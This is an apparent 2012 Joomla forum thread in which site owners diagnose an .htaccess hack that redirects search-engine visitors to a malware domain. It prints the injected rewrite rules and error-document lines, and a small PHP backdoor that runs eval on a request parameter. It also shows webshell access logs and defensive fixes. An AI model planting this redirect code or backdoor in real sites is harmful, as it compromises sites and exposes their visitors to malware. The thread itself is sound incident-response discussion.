All 1.5 sites redirect to Google...Possible 1.5 sites hacked

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

All 1.5 sites redirect to Google...Possible 1.5 sites hacked

Post by crazydiver » Mon Sep 10, 2012 12:37 am

Hello,

It seems that all my 1.5.26 sites are redirecting to Google from Google.

If I access the website directly by typing the domain onto my browser, it's good to go. However, if I do a google search and click on the website which ranks high, it gets redirected to Google causing the user to no see the webpage at all.

I checked my .htaccess and wow... there is some malicious code. Check this out! If possible, maybe the moderators can hide this code so that other hackers will not continue to find another way around it.

Code: Select all

																																																												
																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)																														
																														RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche||claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]																														
																														</IfModule>			
This is only affecting all my 1.5 sites. My question is how do I protect myself from future attacks. Please advise. Thank you.

Here is the entire .htaccess file... It looks wrong.

Code: Select all

																																																												
																														<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtubvista|msnsuchnase|biene|suchmaschine|infospace)\.(.*)																														
																														RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|how|icq|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://invoicingcake .ru/VEREIN?8 [R=301,L]																														
																														</IfModule>																														
																																																												






##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits
########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects
#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section
AddHandler x-httpd-php5.3 .php .phps																								ErrorDocument 500 http://invoicingcake .ru/VEREIN?8
ErrorDocument 404 http://invoicingcake .ru/VEREIN?8																														

Last edited by mandville on Mon Sep 10, 2012 5:50 am, edited 2 times in total.
Reason: reformatted, trimmed code, broke linksto malicious sites

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 12:58 am

What version of 1.5 are you running? Run the Forum Post Assistant as well and post results. When you say all 1.5 sites, you of course me all of yours, how many are you talking about? Are all the sites owned by one user? If so, one site gets hacked due to any number of reasons, bad module, etc, and all your sites will be hacked if running under one user, so you can't necessarily say this is a 1.5 issue.

And yeah, that .htaccess is not the stock htaccess.txt file. You could start by replacing that to at least maybe get things temporarily working while you clean up the site before it's hacked again.
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 1:08 am

Hello,

Thank you so much for your reply.
I am using 1.5.26.

And my apologies for not being clear that it's all my 1.5 sites. I am suspecting 1.5 because all my new 2.5 sites are okay.

About 13 Joomla 1.5.26 sites have had their .htaccess files whacked. Please note it's not all of them.

I will take you advice to get the original .htacces.

Please standby for the FPA reports.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 1:20 am

Hello again,

I would like to send my FPA to any moderators who would like to see it... Please let me know. Who to PM to.

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 2:06 am

just post here.
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 2:17 am

It's a screenshot... is that okay? Or is there another way to post it (copy and past?)

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 2:31 am

If you ran forum post assistant, there's an option to create a copy/paste post...
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 2:43 am

hello,

thank you for the reply but I don't see that option.

Please advise

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 3:19 am

Hello I need help here. I still can't find that option to copy and paste.

It seems that even if I upload an untainted backup, within 30 minutes, the site is hacked again.Is there an extension that can prevent the .htaccess from being hacked?

The permissions for the .htaccess file was at 644. I changed to 444.

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 4:37 am

That is what I'm trying to find out. The .htaccess redirects to these links (don't click ofcourse)

Code: Select all

http://adminsown .ru/VEREIN?8   http://invoicingcake .ru/VEREIN?8
Any advice and tips here would be really appreciated!
Last edited by mandville on Mon Sep 10, 2012 5:54 am, edited 1 time in total.
Reason: broke link

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 4:56 am

Please follow the instructions here: http://docs.joomla.org/Security_Checklist_7
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14791
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by mandville » Mon Sep 10, 2012 5:58 am

very detailed instructions to run the fpa complete with screenshots are at http://forum.joomla.org/viewtopic.php?f=432&t=586336
adminsown url was not in the htacess that you posted, so where did that come from?
a full discussion on this hack subject is at http://forum.joomla.org/viewtopic.php?f=432&t=705216
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 6:08 am

mandville... thank you for the link.

Here it is...
Problem Description :: Forum Post Assistant (v1.2.2) : 10th September 2012 wrote:ht access hack, gets redirected to malware site
Actions Taken To Resolve by Forum Post Assistant (v1.2.2) 10th September 2012 wrote:upload backup... however, site gets hijacked within 30 minutes
Forum Post Assistant (v1.2.2) : 10th September 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (644) | Owner: memyself (uid: 20410/gid: 1000) | Group: members (gid: 1000) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-308.4.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/mysite/mysite.com/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: 0 | Magic Quotes: 1 | Safe Mode: 0 | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.77 (Client:5.0.77) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 2.01 MiB | #of _FPA_TABLE: 54
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.3) | date (5.3.3) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | Reflection ($Revision: 300393 $) | standard (5.3.3) | shmop () | SPL (0.2) | SimpleXML (0.1) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | cgi-fcgi () | bcmath () | curl () | dba () | dom (20031129) | fileinfo (1.0.5-dev) | gd () | imap () | json (1.2.1) | ldap () | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | odbc (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | PDO_ODBC (1.0.1) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | Phar (2.0.1) | posix () | pspell () | snmp () | soap () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | sysvmsg () | sysvsem () | sysvshm () | wddx () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.9.1) | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Extensions Discovered :: wrote:Components :: SITE :: Wrapper (1.5.0) | Gantry (3.0.12) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_[youtube]_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | MailTo (1.5.0) | User (1.5.0) |
Components :: ADMIN :: Frontpage (1.5.0) | RokCandy Bundle (1.3) | Plugin Manager (1.5.0) | Cache Manager (1.5.0) | RokNavMenu Bundle (2.1) | Messaging (1.5.0) | Menus Manager (1.5.0) | Joom!Fish (2.0.4) | Akeeba (3.4.3) | Trash (1.0.0) | Weblinks (1.5.0) | Gantry (3.1.20) | Unknown (-) | JCE (2.0.21) | Editor - JCE (2.0.21) | Search (1.5.0) | RokCandy (1.3) | Newsfeeds (1.5.0) | Media Manager (1.5.0) | RokModule (1.2) | Language Manager (1.5.0) | Polls (1.5.0) | Module Manager (1.5.0) | User Manager (1.5.0) | Xmap (1.2.10) | lknAnswers Plugin (1.5.0) | Remository Plugin (1.0.3) | Web Links Plugin (1.5.1) | Rokdownloads Plugin (1.0.4) | Eventlist Plugin (1.0.0) | KnowledgeBase Plugin (1.0.0) | MyBlog Plugin (1.5.1) | AcyMailing Plugin (1.0.0) | Contacts Plugin (1.0.1) | Content Plugin (1.5.1) | DOCman Plugin (1.5.0) | JCALPro Plugin (1.0.0) | SectionEx Plugin (1.0.2) | Gallery2 Bridge Plugin (1.0.2) | Agora Plugin (1.0.0) | Glossary Plugin (1.5.1) | Rapid Recipe Plugin (1.0.0) | CMS Shop Builder Plugin (1.5.0) | RSGallery2 Extension (1.0.0) | Jomres Plugin (1.0) | Virtuemart Plugin (1.1.4) | JEvents Plugin (1.0.3) | RD-Autos Plugin (1.5.0) | Kunena Plugin (1.0.1) | SOBI2 Plugin (1.5.1) | JMovies Plugin (1.5.0) | JoomDOC Extension (1.0.0) | JDownloads Plugin (1.5.1) | Hot Property Plugin (1.0.1) | JoomSuite Resources Plugin (1.0.0) | Mosets Tree Plugin (1.0.1) | JoomGallery Plugin (1.5.1) | Configuration Manager (1.5.0) | Template Manager (1.5.0) | Content Page (1.5.0) | Frontend User Article List (2.0b) | Control Panel (1.5.0) | QContacts (1.0.6) | Mass Mail (1.5.0) | Contact Items (1.0.0) | Banners (1.5.0) | jsecure (2.1.7) | Installation Manager (1.5.0) |

Modules :: SITE :: Search (1.0.0) | Show IP (1.2) | Statistics (1.5.0) | Poll (1.5.0) | RokTabs (1.15) | Archived Content (1.5.0) | Syndicate (1.5.0) | Breadcrumbs (1.5.0) | Random Image (1.5.0) | Wrapper (1.0.0) | Login (1.5.0) | Sections (1.5.0) | JoomFish-Language Selection (2.0.4) | Newsflash (1.5.0) | Latest News (1.5.0) | RokStories (1.9) | Custom HTML (1.5.0) | Banner (1.5.0) | RokAjaxSearch (2.0) | RokNewsPager (1.7) | Who\'s Online (1.0.0) | Footer (1.5.0) | Menu (1.5.0) | Feed Display (1.5.0) | Most Read Content (1.5.0) | Related Items (1.0.0) | RokNavMenu (2.1) |
Modules :: ADMIN :: Items Stats (1.0.0) | Unread Items (1.0.0) | Title (1.0.0) | Quick Icons (1.0.0) | Direct Translation (2.0.4) | Login Form (1.0.0) | Popular Items (1.0.0) | Latest News (1.0.0) | Online Users (1.0.0) | Toolbar (1.0.0) | Logged in Users (1.0.0) | Custom HTML (1.5.0) | Akeeba Backup Notification Mod (3.4.3) | Admin Menu (1.0.0) | Admin Submenu (1.0.0) | Footer (1.0.0) | User Status (1.5.0) | Feed Display (1.5.0) |

Plugins :: SITE :: Joomfish - Missing Translation (2.0.4) | System - jSecure Authenticatio (2.1.7) | System - Canonicalization (-) | System - Mootools Upgrade (1.5) | System - Remember Me (1.5) | System - RokGantry Cache (1.0) | System - jFinalizer (1.1.5) | System - RokBox (2.4) | System - Log (1.5) | System - RokGZipper (1.9) | System - Backlinks (1.5) | System - Cache (1.5) | System - CssJsCompress (3.5) | Akeeba Backup Lazy Scheduling (3.3) | Joomfish - Basic Router (2.0.4) | System - SEF (1.5) | System - Ban IP Address (-) | System - RokCandy (1.3) | Joomfish - Abstraction Layer (2.0.4) | System - Legacy (1.5) | System - Debug (1.5) | Search - Content (1.5) | Search - Weblinks (1.5) | Search - Newsfeeds (1.5) | Search - Joomfish Sections (2.0.4) | Search - Joomfish Weblinks (2.0.4) | Search - Categories (1.5) | Search - Contacts (1.5) | Search - Sections (1.5) | Search - Joomfish Categories (2.0.4) | Search - Joomfish Contacts (2.0.4) | Search - Joomfish Newsfeeds (2.0.4) | Search - Joomfish Content (2.0.4) | Authentication - OpenID (1.5) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | Authentication - Joomla (1.5) | RokNavMenu - Extended Link (2.1) | RokNavMenu - Boost (2.1) | User - Example (1.0) | User - Joomla! (1.5) | Button - Readmore (1.5) | Button - RokCandy (1.3) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | Advanced Code Editor (1.5.7.5) | Paste (1.5.7.5) | Paste (1.5.7.5) | File Browser (1.5.7.5) | Joomla! Links for Advanced Lin (1.2.1) | Advanced Link (1.5.7.5) | JCE SPELLCHECKER TITLE (1.5.7.5) | Media Object support (1.5.7.5) | Image Manager (1.5.7.5) | Editor - JCE (2.0.21) | Editor - TinyMCE 3 (3.2.6) | Editor - XStandard Lite for Jo (1.0) | Editor - RokPad (1.7) | Content - Page Navigation (1.5) | Content - Example (1.0) | Content - RokBox (1.6) | Content - Code Highlighter (Ge (1.5) | Content - Load Modules (1.5) | Content - Email Cloaking (1.5) | Content - Image gallery - sigp (1.3.1.6) | Joomfish Alternative Language (2.0.4) | Content - Vote (1.5) | Content - Pagebreak (1.5) | XML-RPC - Blogger API (1.0) | XML-RPC - Joomla API (1.0) | XML-RPC - MovableType API (2.3.4) |
Templates Discovered :: wrote:Templates :: SITE :: rt_juxta_j15 (1.5.3) |
Templates :: ADMIN :: Khepri (1.0) |

crazydiver
Joomla! Explorer
Joomla! Explorer
Posts: 377
Joined: Wed May 30, 2007 7:55 am

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by crazydiver » Mon Sep 10, 2012 8:04 am

Hello,

Just curious but is there a problem with the FPA list I pasted.

I have tried upgrading all the extensions but it seems that the .htaccess get hacked into every 30 minutes to an hour. Changing the .htaccess back to the original helps but there is a backdoor somewhere that is controlling the .htaccess file.

I'm looking for it but can't find any.

If there is anyone who know how to block access to the .htaccess please let me know.

Thank you.

carloferrari
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Sep 28, 2006 1:13 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by carloferrari » Mon Sep 10, 2012 8:31 am

I get the same problem today with a 1.5 Joomla web site. I found .htaccess file into root of all infected sites

User avatar
dracon
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Thu Nov 05, 2009 10:18 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by dracon » Mon Sep 10, 2012 9:51 am

Vi get the same problem.
Check your images/stories folder as well. There it could be 2 PHP files (story.php, cache_cjcccq.php).

story.php has following code inside:

Code: Select all

GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>
cache_cjcccq.php is the class JToolBarHelper...

maybe modified. Didn't check this for now.

in cPanel is an error.log that shows a long list:

[10-Sep-2012 05:14:54 UTC] PHP Warning: Module 'pdo_mysql' already loaded in Unknown on line 0
[10-Sep-2012 05:14:54 UTC] PHP Warning: Module 'PDO' already loaded in Unknown on line 0
Det er aldri for sent å begynne noe nytt!

carloferrari
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Sep 28, 2006 1:13 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by carloferrari » Mon Sep 10, 2012 10:47 am

Every time we delete the .htaccess file after few minutes the file appears again.

siongraham
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Thu May 29, 2008 12:00 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by siongraham » Mon Sep 10, 2012 1:56 pm

If it's any help to anyone, I've taken the following steps and found the .htaccess file is no longer being infected:
  • Restore your /home/mydomain/public_html/.htaccess file,
    Set permissions to 444,
    Set owner to root
    Create an empty file in /home/mydomain/.htaccess, as this was also being created with the suspect code. Again this is owned by root with 444 permissions.
Looking at the logs I can see a suspicious file being accessed by an address in Poland:

Code: Select all

192.166.219.91 - - [10/Sep/2012:10:15:31 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:10:15:35 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 500 432 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:11:17:03 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
192.166.219.91 - - [10/Sep/2012:11:17:06 +0100] "POST /images/banners/.lib_tcxahx.php HTTP/1.1" 500 472 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
I therefore modified the /home/mydomain/.htaccess file to contain the following:

Code: Select all

RedirectMatch 404 /\..*$
This I hope will prevent Apache from serving hidden files. I then deleted the files. Note that in my case the file was always called /images/banners/.lib_XXXXXX.php, where XXXXXX varied from site to site. I had three sites infected out of about 60, all running Joomla 1.5.25.

This doesn't tackle the root cause of the problem, but my customers are crying out loud to get their sites restored. I suspect the problem will return somehow until we know what the problem is.

I'm not suggesting you should copy my actions and forget about the problem. But I've been waiting for a couple of hours and have not had the problem come back.

York-Besom
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2012 2:55 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by York-Besom » Mon Sep 10, 2012 3:05 pm

I am having the same problem on 1.5.23 - but not I can not access the CP of my site, I can only access via FTP.
I have tried replacing the inidividual .htaccess files (with an old safe version) but to no avail. My host suggested I wipe my site and load on an old back-up.

"Restore your /home/mydomain/public_html/.htaccess file,
Set permissions to 444,
Set owner to root
Create an empty file in /home/mydomain/.htaccess, as this was also being created with the suspect code. Again this is owned by root with 444 permissions."

How do I set the permissions to 444?

Jowiko
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2012 3:45 pm

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by Jowiko » Mon Sep 10, 2012 3:56 pm

I had the same problem on a bunch of my 1.5 sites. I have no idea which vulnerability they used, but it must be a common/easy one to exploit because a few weeks ago I did the same thing, but the code re-appeared after they hacked into it again. I even removed the extensions that I thought were causing the problem to no avail. Since I found the scripts in the images folder, I then placed my own .htaccess file in all the images folder that prevents any scripts from running from those folders:

Code: Select all

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi .html
Options -ExecCGI
That way when any php files or other files like it are run from those folders, a forbidden error results.

Note: If you do this, make sure you put it in folders that don't need .php files or other scripts to run, as it will produce the same error for those pages! Only image files will load from those folders.

User avatar
euoceo
Joomla! Guru
Joomla! Guru
Posts: 955
Joined: Fri Sep 12, 2008 2:48 pm
Location: Sacramento
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by euoceo » Mon Sep 10, 2012 4:40 pm

It doesn't matter that you've replaced .htaccess, that's not fixed for the hack/problem. Once your website has been hacked, there could be trojans left in anything, giving the hacker/bot an easy in. As your host said, and in the instructions of that link I sent, you wipe out all the files in that directory (take a backup for images/etc) and then reupload a clean version of Joomla and all the modules/etc you use. Only then can you be sure that there's nothing hidden/left in an obscure file.

http://docs.joomla.org/Security_Checklist_7

Better yet, review them all: http://docs.joomla.org/Security
Joomla! Web Hosting, Design, and Consulting.
Portfolio: http://www.calweb.com/joomla
Please do not PM me for help, use the forums first.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: All 1.5 sites redirect to Google...Possible 1.5 sites ha

Post by PhilD » Mon Sep 10, 2012 4:48 pm

"site redirects to other places."
Unless you did this on purpose then your htaccess (and site) has been hacked.

"Every time I delete the htaccess it comes back."
Some hosts may insert a blank or a basic htaccess file with one or two lines of code in the public_html directory (your web root directory). However, If the htaccess file causes redirects, then you are hacked.

"something keeps altering my htaccess file and redirecting my site."
You are hacked.

"There is an htaccess file outside of the web root (public_html) directory." There should be no htaccess file outside of the web root (public_html) directory. If there is you have been hacked

The htaccess hack works similar to this
site is hacked with randomly named files placed in rather common places. Files can have legitimate sounding names, they may even have legitimate comments at the top of the file. This is done to attempt to blend in or hide the files within the site. the file names mean nothing and are likely different for each site.

code is added to your htaccess file that is not obvious at first look as added code is pushed to the far right which is generally off screen but can be viewed by scrolling to the right in a text editor.

a copy of the altered htaccess file is placed outside of the public_html directory. the htaccess file within the public_html directory is compared to the copy every time a visitor visits the site. If the compare is different the altered one outside the public_html directory is copied back to the public_html directory replacing the one that is there. This is why the redirects reappear.

If your sites htaccess file has not been altered by any hack code being added, then you are likely suffering with a different type of hack.

adding htaccess files and code to not run certain file extensions from the images directories and the like only masks the issue, and does not fix the issue. This procedure was common when sites needed relaxed permissions (777) to operate properly. This is not so common now.

Common master accounts
If you have multiple sites under one "master" account, then all (or most of) the sites may be hacked if one site is compromised.

If a site has been compromised, then it is likely that no matter what you do or what permissions you have, you are likely to continue to be hacked. You have to remove the hack and fix how they got in in the first place. The easiest and most effective way of doing this is to follow the checklist:
PhilD wrote:
Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.


You must state what version of Joomla you were using when when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic.

[ ] Ensure you have the latest version of Joomla for your 1.5 or 2.5 version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

